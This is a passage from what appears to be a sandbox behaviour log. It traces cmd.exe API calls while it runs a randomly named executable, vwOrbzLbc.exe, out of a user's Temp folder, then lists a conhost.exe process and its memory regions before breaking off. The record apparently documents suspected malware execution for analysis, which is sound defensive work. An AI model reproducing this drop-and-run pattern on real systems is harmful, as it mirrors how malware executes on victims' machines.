| out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0025.580] _wcsicmp (_String1="call", _String2="DIR") returned -1 [0025.580] _wcsicmp (_String1="call", _String2="ERASE") returned -2 [0025.580] _wcsicmp (_String1="call", _String2="DEL") returned -1 [0025.580] _wcsicmp (_String1="call", _String2="TYPE") returned -17 [0025.580] _wcsicmp (_String1="call", _String2="COPY") returned -14 [0025.580] _wcsicmp (_String1="call", _String2="CD") returned -3 [0025.580] _wcsicmp (_String1="call", _String2="CHDIR") returned -7 [0025.580] _wcsicmp (_String1="call", _String2="RENAME") returned -15 [0025.580] _wcsicmp (_String1="call", _String2="REN") returned -15 [0025.580] _wcsicmp (_String1="call", _String2="ECHO") returned -2 [0025.580] _wcsicmp (_String1="call", _String2="SET") returned -16 [0025.580] _wcsicmp (_String1="call", _String2="PAUSE") returned -13 [0025.580] _wcsicmp (_String1="call", _String2="DATE") returned -1 [0025.580] _wcsicmp (_String1="call", _String2="TIME") returned -17 [0025.580] _wcsicmp (_String1="call", _String2="PROMPT") returned -13 [0025.580] _wcsicmp (_String1="call", _String2="MD") returned -10 [0025.580] _wcsicmp (_String1="call", _String2="MKDIR") returned -10 [0025.580] _wcsicmp (_String1="call", _String2="RD") returned -15 [0025.580] _wcsicmp (_String1="call", _String2="RMDIR") returned -15 [0025.580] _wcsicmp (_String1="call", _String2="PATH") returned -13 [0025.580] _wcsicmp (_String1="call", _String2="GOTO") returned -4 [0025.580] _wcsicmp (_String1="call", _String2="SHIFT") returned -16 [0025.580] _wcsicmp (_String1="call", _String2="CLS") returned -11 [0025.580] _wcsicmp (_String1="call", _String2="CALL") returned 0 [0025.582] _wcsicmp (_String1="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe\"", _String2=")") returned -7 [0025.582] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe\"") returned 68 [0025.582] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe\"") returned 68 [0025.582] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe\"") returned 71 [0025.582] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe\"") returned 71 [0025.582] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe\"") returned 80 [0025.582] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe\"") returned 80 [0025.582] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0025.582] SetErrorMode (uMode=0x0) returned 0x0 [0025.583] SetErrorMode (uMode=0x1) returned 0x0 [0025.583] GetFullPathNameW (in: lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x4bba2274b0, lpFilePart=0x4bba1cf460 | out: lpBuffer="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", lpFilePart=0x4bba1cf460*="Temp") returned 0x24 [0025.583] SetErrorMode (uMode=0x0) returned 0x1 [0025.583] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\.") returned 1 [0025.583] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff6ded08680, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0025.586] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0025.586] FindFirstFileExW (in: lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe", fInfoLevelId=0x1, lpFindFileData=0x4bba1cf1e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4bba1cf1e0) returned 0x4bba227630 [0025.586] FindClose (in: hFindFile=0x4bba227630 | out: hFindFile=0x4bba227630) returned 1 [0025.586] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0025.586] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0025.586] GetConsoleTitleW (in: lpConsoleTitle=0x4bba1cf4c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0025.602] GetFileAttributesW (lpFileName="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe\"" (normalized: "c:\\windows\\system32\\\"c:\\users\\ciihmn~1\\appdata\\local\\temp\\vworbzlbc.exe\"")) returned 0xffffffff [0025.602] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0025.602] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0025.602] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0025.602] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0025.602] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0025.602] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0025.602] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0025.602] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0025.602] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0025.602] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0025.602] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0025.602] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0025.602] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0025.602] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0025.602] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0025.602] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0025.602] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0025.602] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0025.602] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0025.602] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0025.602] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0025.602] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0025.602] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0025.602] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0025.602] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0025.602] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0025.602] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0025.602] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0025.603] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0025.603] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0025.603] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0025.603] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0025.603] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0025.603] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0025.603] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0025.603] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0025.603] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0025.603] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0025.603] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0025.603] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0025.603] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0025.603] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0025.603] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0025.603] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0025.603] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0025.603] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0025.603] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0025.603] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0025.603] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0025.603] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0025.603] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0025.603] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0025.603] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0025.603] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0025.603] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0025.603] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0025.603] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0025.603] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0025.603] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0025.603] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0025.603] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0025.603] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0025.603] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0025.603] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0025.603] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0025.603] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0025.603] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0025.603] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0025.603] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0025.603] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0025.603] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0025.604] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0025.604] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0025.604] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0025.604] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0025.604] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0025.604] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0025.604] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0025.604] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0025.604] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0025.604] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0025.604] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0025.604] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0025.604] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0025.604] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0025.604] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0025.604] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0025.604] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0025.604] SetErrorMode (uMode=0x0) returned 0x0 [0025.604] SetErrorMode (uMode=0x1) returned 0x0 [0025.604] GetFullPathNameW (in: lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x4bba227980, lpFilePart=0x4bba1ced60 | out: lpBuffer="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", lpFilePart=0x4bba1ced60*="Temp") returned 0x24 [0025.604] SetErrorMode (uMode=0x0) returned 0x1 [0025.604] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\.") returned 1 [0025.605] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff6ded08680, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0025.607] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0025.607] FindFirstFileExW (in: lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe", fInfoLevelId=0x1, lpFindFileData=0x4bba1ceae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4bba1ceae0) returned 0x4bba227630 [0025.607] FindClose (in: hFindFile=0x4bba227630 | out: hFindFile=0x4bba227630) returned 1 [0025.607] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0025.608] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0025.608] GetConsoleTitleW (in: lpConsoleTitle=0x4bba1cf040, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0025.608] InitializeProcThreadAttributeList (in: lpAttributeList=0x4bba1cef60, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4bba1cee60 | out: lpAttributeList=0x4bba1cef60, lpSize=0x4bba1cee60) returned 1 [0025.608] UpdateProcThreadAttribute (in: lpAttributeList=0x4bba1cef60, dwFlags=0x0, Attribute=0x60001, lpValue=0x4bba1cee4c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4bba1cef60, lpPreviousValue=0x0) returned 1 [0025.608] GetStartupInfoW (in: lpStartupInfo=0x4bba1ceef0 | out: lpStartupInfo=0x4bba1ceef0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0025.608] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0025.608] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0025.608] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0025.608] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0025.608] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0025.608] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0025.608] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0025.608] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0025.608] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3 [0025.608] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3 [0025.608] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0025.608] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0025.608] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0025.608] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0025.608] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0025.608] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0025.608] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0025.608] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0025.608] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0025.608] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0025.608] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0025.609] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0025.609] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0025.609] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0025.609] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0025.609] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0025.609] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0025.609] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0025.609] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0025.609] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0025.609] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0025.609] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0025.609] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0025.609] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0025.609] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0025.609] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0025.609] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0025.609] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0025.609] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0025.609] lstrcmpW (lpString1="\\vwOrbzLbc.exe", lpString2="\\XCOPY.EXE") returned -1 [0025.611] CreateProcessW (in: lpApplicationName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe", lpCommandLine="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x4bba1cee80*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4bba1cee68 | out: lpCommandLine="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe\"", lpProcessInformation=0x4bba1cee68*(hProcess=0x8c, hThread=0x88, dwProcessId=0xfac, dwThreadId=0xfb0)) returned 1 [0025.897] CloseHandle (hObject=0x88) returned 1 [0025.897] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0025.898] GetEnvironmentStringsW () returned 0x4bba22e620* [0025.898] FreeEnvironmentStringsA (penv="=") returned 1 [0025.898] WaitForSingleObject (hHandle=0x8c, dwMilliseconds=0xffffffff) returned 0x0 [0037.406] GetExitCodeProcess (in: hProcess=0x8c, lpExitCode=0x4bba1cede8 | out: lpExitCode=0x4bba1cede8*=0x0) returned 1 [0037.406] CloseHandle (hObject=0x8c) returned 1 [0037.406] _vsnwprintf (in: _Buffer=0x4bba1cefa8, _BufferCount=0x13, _Format="%08X", _ArgList=0x4bba1cedf8 | out: _Buffer="00000000") returned 8 [0037.407] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0037.407] GetEnvironmentStringsW () returned 0x4bba22f2e0* [0037.407] FreeEnvironmentStringsA (penv="=") returned 1 [0037.407] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0037.407] GetEnvironmentStringsW () returned 0x4bba22f2e0* [0037.407] FreeEnvironmentStringsA (penv="=") returned 1 [0037.407] DeleteProcThreadAttributeList (in: lpAttributeList=0x4bba1cef60 | out: lpAttributeList=0x4bba1cef60) [0037.407] _get_osfhandle (_FileHandle=1) returned 0x24 [0037.407] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x3) returned 1 [0037.407] _get_osfhandle (_FileHandle=1) returned 0x24 [0037.407] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff6ded085ec | out: lpMode=0x7ff6ded085ec) returned 1 [0037.407] _get_osfhandle (_FileHandle=0) returned 0x20 [0037.407] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff6ded085e8 | out: lpMode=0x7ff6ded085e8) returned 1 [0037.408] SetConsoleInputExeNameW () returned 0x1 [0037.408] GetConsoleOutputCP () returned 0x1b5 [0037.408] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6ded08640 | out: lpCPInfo=0x7ff6ded08640) returned 1 [0037.408] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.408] exit (_Code=0) Thread: id = 21 os_tid = 0xfa8 Process: id = "4" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x3ad10000" os_pid = "0xf94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xf8c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013d92" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 395 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 396 start_va = 0x1e3a120000 end_va = 0x1e3a13ffff entry_point = 0x0 region_type = private name = "private_0x0000001e3a120000" filename = "" Region: id = 397 start_va = 0x1e3a140000 end_va = 0x1e3a153fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001e3a140000" filename = "" Region: id = 398 start_va = 0x1e3a160000 end_va = 0x1e3a19ffff entry_point = 0x0 region_type = private name = "private_0x0000001e3a160000" filename = "" Region: id = 399 start_va = 0x7df5ffeb0000 end_va = 0x7ff5ffeaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffeb0000" filename = "" Region: id = 400 start_va = 0x7ff79d560000 end_va = 0x7ff79d582fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff79d560000" filename = "" Region: id = 401 start_va = 0x7ff79d58b000 end_va = 0x7ff79d58bfff entry_point = 0x0 region_type = private name = "private_0x00007ff79d58b000" filename = "" Region: id = 402 start_va = 0x7ff79d58e000 end_va = 0x7ff79d58ffff entry_point = 0x0 region_type = private name = "private_0x00007ff79d58e000" filename = "" Region: id = 403 start_va = 0x7ff79e220000 end_va = 0x7ff79e230fff entry_point = 0x7ff79e220000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 404 start_va = 0x7ffb3d310000 end_va = 0x7ffb3d4d1fff entry_point = 0x7ffb3d310000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 405 start_va = 0x1e3a360000 end_va = 0x1e3a45ffff entry_point = 0x0 region_type = private name = "private_0x0000001e3a360000" filename = "" Region: id = 406 start_va = 0x7ffb3a800000 end_va = 0x7ffb3a9dcfff entry_point = 0x7ffb3a800000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 407 start_va = 0x7ffb3d260000 end_va = 0x7ffb3d30cfff entry_point = 0x7ffb3d260000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 408 start_va = 0x1e3a120000 end_va = 0x1e3a12ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001e3a120000" filename = "" Region: id = 409 start_va = 0x1e3a130000 end_va = 0x1e3a136fff entry_point = 0x0 region_type = private name = "private_0x0000001e3a130000" filename = "" Region: id = 410 start_va = 0x1e3a1a0000 end_va = 0x1e3a25dfff entry_point = 0x1e3a1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 411 start_va = 0x1e3a260000 end_va = 0x1e3a29ffff entry_point = 0x0 region_type = private name = "private_0x0000001e3a260000" filename = "" Region: id = 412 start_va = 0x1e3a2a0000 end_va = 0x1e3a2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001e3a2a0000" filename = "" Region: id = 413 start_va = 0x1e3a2b0000 end_va = 0x1e3a2b6fff entry_point = 0x0 region_type = private name = "private_0x0000001e3a2b0000" filename = "" Region: id = 414 start_va = 0x1e3a2c0000 end_va = 0x1e3a2c0fff entry_point = 0x0 region_type = private name = "private_0x0000001e3a2c0000" filename = "" Region: id = 415 start_va = 0x1e3a2d0000 end_va = 0x1e3a2d0fff entry_point = 0x0 region_type = private name = "private_0x0000001e3a2d0000" filename = "" Region: id = 416 start_va = 0x1e3a550000 end_va = 0x1e3a55ffff entry_point = 0x0 region_type = private name = "private_0x0000001e3a550000" filename = "" Region: id = 417 start_va = 0x1e3a560000 end_va = 0x1e3a6e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001e3a560000" filename = "" Region: id = 418 start_va = 0x1e3a6f0000 end_va = 0x1e3a870fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001e3a6f0000" filename = "" Region: id = 419 start_va = 0x1e3a880000 end_va = 0x1e3bc7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001e3a880000" filename = "" Region: id = 420 start_va = 0x7ff79d460000 end_va = 0x7ff79d55ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff79d460000" filename = "" Region: id = 421 start_va = 0x7ff79d58c000 end_va = 0x7ff79d58dfff entry_point = 0x0 region_type = private name = "private_0x00007ff79d58c000" filename = "" Region: id = 422 start_va = 0x7ffb25140000 end_va = 0x7ffb25192fff entry_point = 0x7ffb25140000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 423 start_va = 0x7ffb36950000 end_va = 0x7ffb36ad2fff entry_point = 0x7ffb36950000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 424 start_va = 0x7ffb3bf80000 end_va = 0x7ffb3c0a5fff entry_point = 0x7ffb3bf80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 425 start_va = 0x7ffb3c290000 end_va = 0x7ffb3c2c5fff entry_point = 0x7ffb3c290000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 426 start_va = 0x7ffb3c3e0000 end_va = 0x7ffb3c564fff entry_point = 0x7ffb3c3e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 427 start_va = 0x7ffb3c650000 end_va = 0x7ffb3c79dfff entry_point = 0x7ffb3c650000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 428 start_va = 0x7ffb3c950000 end_va = 0x7ffb3c9aafff entry_point = 0x7ffb3c950000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 429 start_va = 0x7ffb3c9b0000 end_va = 0x7ffb3ca6dfff entry_point = 0x7ffb3c9b0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 430 start_va = 0x7ffb3cb20000 end_va = 0x7ffb3cc60fff entry_point = 0x7ffb3cb20000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 431 start_va = 0x7ffb3cc70000 end_va = 0x7ffb3ceebfff entry_point = 0x7ffb3cc70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: 